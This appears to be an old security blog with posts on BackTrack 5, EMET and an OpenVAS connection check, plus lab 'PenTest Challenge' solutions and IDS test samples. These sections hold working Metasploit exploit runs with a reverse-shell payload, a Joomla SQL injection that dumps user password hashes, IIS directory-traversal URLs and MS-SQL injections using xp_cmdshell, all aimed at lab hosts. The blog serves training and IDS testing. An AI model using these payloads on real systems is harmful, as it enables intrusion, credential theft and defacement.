Monday, May 30, 2011

BackTrack 5

BackTrack 5 was released on May 11.

BackTrack is intended for all audiences, from the most savvy security professionals to newcomers to the information security field. BackTrack offers a quick and easy way to find and update the largest collection of security tools to date. Our community of users ranges from skilled penetration testers in the information security field, government entities and information technology staff to security enthusiasts and individuals new to the security community.

Feedback from all industries and skill levels allows us to develop a solution that is tailored to everyone and far exceeds anything else available, commercial or free. The project is funded by Offensive Security. Whether you're hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client, BackTrack is the one-stop shop for all of your security needs.

BackTrack 5 comes in several flavors and architectures. The VM and ISO images are available in KDE and GNOME flavors.

Visit http://www.backtrack-linux.org/downloads/ to download your preferred flavor.

Saturday, April 30, 2011

Microsoft EMET

The Enhanced Mitigation Experience Toolkit (EMET) is designed to help prevent hackers from gaining access to your system.

Software vulnerabilities and exploits have become an everyday part of life. Virtually every product has to deal with them, and consequently users are faced with a constant stream of security updates. For users who get attacked before the latest updates have been applied, or before an update is even available, the results can be devastating: malware infection, loss of PII, etc.

Download EMET

Monday, December 6, 2010

OpenVAS Client & Server Connection

OpenVAS Vulnerability Scanner is one of the world's most advanced open source vulnerability scanners available today. For various reasons, you might find that the OpenVAS server (openvassd) does not run as expected after loading all of its plugins.

To check the OpenVAS client and server connection, we can issue this command:

root@bt:/usr/local/sbin# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
cupsd 5491 root 2u IPv4 18281 TCP localhost:ipp (LISTEN)
nessusd 5759 root 4u IPv4 18917 TCP *:nessus (LISTEN)
nessusd 5759 root 6u IPv6 18920 TCP *:nessus (LISTEN)
nessusd 5759 root 8u IPv4 19018 TCP *:8834 (LISTEN)
dhclient 6245 root 5u IPv4 22498 UDP *:bootpc
openvassd 30053 root 4u IPv6 61325 TCP *:9390 (LISTEN)
OpenVAS-C 30065 root 5u IPv4 61625 TCP localhost:52713->localhost:9390 (ESTABLISHED)
openvassd 30069 root 6u IPv6 61346 TCP localhost:9390->localhost:52713 (ESTABLISHED)

The OpenVAS server listens on TCP port 9390 by default. In the output above, openvassd is listening on *:9390, and the OpenVAS client (shown as OpenVAS-C, truncated by lsof) has an ESTABLISHED connection from localhost:52713 to localhost:9390, which confirms that client and server are talking to each other.
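As an added example (not part of the original post or of OpenVAS itself), this Python snippet automates the check above: it parses `lsof -i` output, confirms that openvassd is listening on the server port and lists any ESTABLISHED client connections to it. The sample input is taken from the output shown above; the function and variable names are my own.

```python
import re

# Sample lsof -i rows in the shape of the output shown above. Older lsof
# prints no SIZE/OFF value for sockets (8 fields); newer ones print 0t0
# (9 fields), so rows are located by the NODE column ("TCP") rather than
# by a fixed field index.
SAMPLE_LSOF = """\
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
cupsd 5491 root 2u IPv4 18281 TCP localhost:ipp (LISTEN)
nessusd 5759 root 4u IPv4 18917 TCP *:nessus (LISTEN)
dhclient 6245 root 5u IPv4 22498 UDP *:bootpc
openvassd 30053 root 4u IPv6 61325 TCP *:9390 (LISTEN)
OpenVAS-C 30065 root 5u IPv4 61625 TCP localhost:52713->localhost:9390 (ESTABLISHED)
openvassd 30069 root 6u IPv6 61346 TCP localhost:9390->localhost:52713 (ESTABLISHED)
"""

# NAME column layout: local[->remote][ (STATE)]
NAME_RE = re.compile(r"^(\S+?)(?:->(\S+))?(?: \((\w+)\))?$")

def port_of(addr):
    """Port number (or service name) after the last ':' of host:port."""
    return addr.rsplit(":", 1)[-1]

def check_openvas(lsof_text, port=9390):
    """Return (server_listening, [(client_cmd, client_addr), ...]).
    A client is any ESTABLISHED TCP connection whose remote port is `port`."""
    listening, clients = False, []
    for line in lsof_text.splitlines()[1:]:          # skip header row
        fields = line.split()
        if "TCP" not in fields:
            continue
        i = fields.index("TCP")
        cmd, name = fields[0], " ".join(fields[i + 1:])
        m = NAME_RE.match(name)
        if not m:
            continue
        local, remote, state = m.groups()
        # lsof truncates COMMAND to 9 characters, so match on the prefix.
        if state == "LISTEN" and port_of(local) == str(port) and cmd.startswith("openvassd"):
            listening = True
        elif state == "ESTABLISHED" and remote and port_of(remote) == str(port):
            clients.append((cmd, local))
    return listening, clients

if __name__ == "__main__":
    up, clients = check_openvas(SAMPLE_LSOF)
    print("openvassd listening on 9390:", up)
    for cmd, addr in clients:
        print("client", cmd, "connected from", addr)
```

On a live box, pipe the real output in with `lsof -i | python3 this_script.py` after replacing SAMPLE_LSOF with `sys.stdin.read()`.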

Tuesday, November 23, 2010

PenTest Challenge (131.107.1.250)

Solutions

1. MS-DNS RPC Vulnerability (MS07-029)

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
RHOST => 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
LHOST => 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
LPORT => 443
msf exploit(ms07_029_msdns_zonename) > set TARGET 0
TARGET => 0
msf exploit(ms07_029_msdns_zonename) > exploit

2. SQL Injection Vulnerability in Joomla Component (Amblog)

Link: http://www.exploit-db.com/exploits/14596/

http://131.107.1.250/joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version

http://131.107.1.250/joomla/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

Monday, November 22, 2010

IDS Testing (Samples)

Lab hosts: TEST-BT4 = 131.107.1.252, DEN-WEB1 = 131.107.1.101, DEN-WEB2 = 131.107.1.254, LON-IDS1 = 131.107.1.126

From TEST-BT4, launch these commands:

Anomaly Test
ping -s 65000 131.107.1.254

Port Scan Tests
nmap -sS 131.107.1.254
hping2 --scan 80,135,443,445 -S 131.107.1.254

Web Attack Tests
http://131.107.1.254/robots.txt
http://131.107.1.126/robots.txt

http://131.107.1.254/.htaccess
http://131.107.1.126/.htaccess

IIS Unicode Directory Traversal Attack Tests
http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

MS-SQL Injection Tests
http://131.107.1.101/index.asp?newscode=1'
http://131.107.1.101/index.asp?newscode=1 having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid,newsdesc having 1=1 --
http://131.107.1.101/index.asp?newscode=1;update newstable1 set newsdesc='HACKED!' where newsid=1;--
http://131.107.1.101/index.asp?newscode=1;exec master..xp_cmdshell 'dir c:\';--

Exploit Test
cd /pentest/exploits/framework3
./msfconsole

msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set RHOST 131.107.1.254
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

IDS Evasion Test (Slow/Sneaky Scan)
nmap -sS -PN -p80,443 -T1 131.107.1.254
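As an added example from the detection side (not part of the original post), the following Python script checks web-server access-log lines for the request patterns used in the web, IIS Unicode traversal and MS-SQL injection tests above, the way a simple IDS signature check would, including the double URL decoding needed to expose the `%255c` sequence. The log lines are constructed samples in Common Log Format using the lab addresses from this post; the signature names are labels I chose for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format) modelled on the
# test requests above; the source address is TEST-BT4 from this post.
SAMPLE_LOG = """\
131.107.1.252 - - [22/Nov/2010:10:01:02 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 200 512
131.107.1.252 - - [22/Nov/2010:10:01:05 +0000] "GET /index.asp?newscode=1%20having%201=1%20-- HTTP/1.1" 500 301
131.107.1.252 - - [22/Nov/2010:10:01:09 +0000] "GET /index.asp?newscode=1;exec%20master..xp_cmdshell%20'dir%20c:\\';-- HTTP/1.1" 500 301
131.107.1.252 - - [22/Nov/2010:10:01:12 +0000] "GET /.htaccess HTTP/1.1" 403 210
131.107.1.252 - - [22/Nov/2010:10:01:15 +0000] "GET /index.asp?newscode=1 HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+)')

# Hypothetical signature labels; each regex runs over the decoded, lower-cased URI.
SIGNATURES = [
    ("iis-unicode-traversal", re.compile(r"\.\.[\\/].*cmd\.exe")),
    ("sqli-having", re.compile(r"\bhaving\s+1\s*=\s*1")),
    ("sqli-group-by", re.compile(r"\bgroup\s+by\s+\w+")),
    ("sqli-xp_cmdshell", re.compile(r"\bxp_cmdshell\b")),
    ("sqli-stacked-update", re.compile(r";\s*update\s+\w+\s+set\b")),
    ("sensitive-file-probe", re.compile(r"^/(\.htaccess|robots\.txt)$")),
]

def normalize(uri):
    """Decode twice so double-encoded bytes such as %255c (-> %5c -> backslash)
    are exposed, then lower-case so matching is case-insensitive."""
    return unquote(unquote(uri)).lower()

def detect(line):
    """Return (src, raw_uri, [matched signature names]) or None for a clean line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = normalize(m.group("uri"))
    hits = [name for name, rx in SIGNATURES if rx.search(uri)]
    return (m.group("src"), m.group("uri"), hits) if hits else None

def scan_log(text):
    """Run detect() over every line and keep only the alerts."""
    return [d for d in (detect(l) for l in text.splitlines()) if d]

if __name__ == "__main__":
    for src, uri, hits in scan_log(SAMPLE_LOG):
        print(f"ALERT {src} {', '.join(hits)}: {uri}")
```

The anomaly, port-scan and slow-scan tests need stateful counting across packets and time rather than per-request pattern matching, so they are out of scope for this snippet.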